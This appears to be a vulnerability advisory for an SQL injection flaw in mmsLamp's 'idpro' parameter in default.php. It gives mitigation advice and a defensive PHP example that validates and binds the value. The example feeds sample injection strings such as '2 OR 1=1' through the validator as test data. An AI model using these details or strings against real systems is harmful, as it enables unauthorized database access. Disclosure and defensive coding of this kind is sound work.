vendor: mmsLamp
by: x0kster
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: mmsLamp
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
mmsLamp SQL Injection Vulnerability
The mmsLamp application is vulnerable to SQL injection. An attacker can manipulate the 'idpro' parameter in the 'default.php' script to execute arbitrary SQL queries. This can lead to unauthorized access, data leakage, or even remote code execution.
Mitigation:
To mitigate this vulnerability, validate user input such as the 'idpro' parameter and use parameterized queries in the application code. Additionally, keep the application up to date with security patches and conduct regular security audits.
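The two mitigations above, applied to a value like 'idpro', as an added example that is not mmsLamp's own code. The `products` table, its columns, the `fetch_product()` helper, the in-memory SQLite database and the assumption that 'idpro' is a numeric identifier are all hypothetical.

```php
<?php
declare(strict_types=1);

// Added illustration, not mmsLamp source code. The schema and the
// fetch_product() helper are hypothetical; 'idpro' is assumed to be
// a positive integer identifier.

/** Validate idpro as a positive integer, then bind it as a typed parameter. */
function fetch_product(PDO $db, $rawIdpro): ?array
{
    // Input validation: accept only a well-formed integer >= 1.
    $id = filter_var($rawIdpro, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject instead of handing the value to the database
    }

    // Parameterized query: the value is bound separately and never
    // becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, name FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO products (id, name) VALUES (1, 'lamp'), (2, 'shade')");

// Constructed inputs standing in for $_GET['idpro'].
foreach (['2', '2 OR 1=1', "2'", '', '-5'] as $raw) {
    $row = fetch_product($db, $raw);
    printf("%-12s => %s\n", var_export($raw, true), $row ? $row['name'] : 'rejected or not found');
}
```

Validation and binding are deliberately layered: the bound parameter still protects the query if the validation rule is later loosened.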